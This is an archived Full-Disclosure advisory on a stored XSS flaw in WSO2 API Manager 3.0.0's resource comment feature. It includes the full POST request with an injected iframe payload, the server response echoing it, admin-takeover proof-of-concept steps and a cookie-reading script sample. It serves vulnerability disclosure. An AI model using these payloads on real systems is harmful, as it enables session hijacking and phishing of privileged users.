lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJ-5kWaRUWjOd3aGy8ux37SVBa6Vgzk4Fn6t08oHXfbw+z+zsQ@mail.gmail.com> Date: Mon, 13 Apr 2020 19:57:19 +0200 From: raki ben hamouda <raki7bh@...il.com> To: Offsec Exploits <submit@...ensive-security.com>, submit@...sec.com, Packet Storm <packet@...ketstormsecurity.com>, fulldisclosure@...lists.org, webmaster@...urityfocus.com, "CERT(R) Coordination Center" <cert@...t.org> Subject: [FD] WSO2 API Manager Stored XSS Vulnerabilty Document Title: =============== WSO2 API Manager Stored XSS Vulnerability Common Vulnerability Scoring System: ==================================== 5.4 CVE : =================== N/A Security Advisory : =================== https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Latest Release after Fixing Vuln: =================================== V 3.1.0 (https://wso2.com/library/articles/introducing-wso2-api-manager-3-1/ ) Author : ================== Raki Ben Hamouda Affected Product(s): ==================== WSO2 API Manager Carbon interface V3.0.0 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A remote Stored Cross Site Scripting has been discovered in WSO2 API Manager Ressource Browser component). The security vulnerability allows a remote attacker With access to the component "Ressource Browser" to inject a malicious code in Add Comment Feature. The vulnerability is triggered after sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with Parameter "comment=targeted&path=%2F". Remote attackers has the ablility to spread a malware,to Hijack a session (a session with Higher privileges), or to initiate phishing attacks. The security risk of the Stored XSS web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.4 Exploitation of the Stored XSS web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in Compromising the server . Request Method: [+] POST Module: [+] /carbon/info/comment-ajaxprocessor.jsp Parameters: [+] comment=admincomment [+] path=%2F ======================================= POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 Host: 192.168.149.1:9443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH Content-Length: 64 Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 Connection: close comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F ============================== HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY vary: accept-encoding Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Tue, 31 Dec 2019 10:50:00 GMT Connection: close Server: WSO2 Carbon Server Content-Length: 3144 //the body of response includes attacker malicious script <a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a> <iframe href=http://phishing_url> <br/> posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker Proof of Concept (PoC): ======================= //Let's suppose we're Attacking an admin with higher privileges 1-Attacker opens his account 2-add arbitrary comment 3-intercepts the request 4-add malicious script to the comment 5-admin access his account,he wants to add a comment,the malicious script got executed ===>Admin account compromised =============================================================================== Example malicious script : <script> alert(document.cookie); </script> =============================================================================== _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists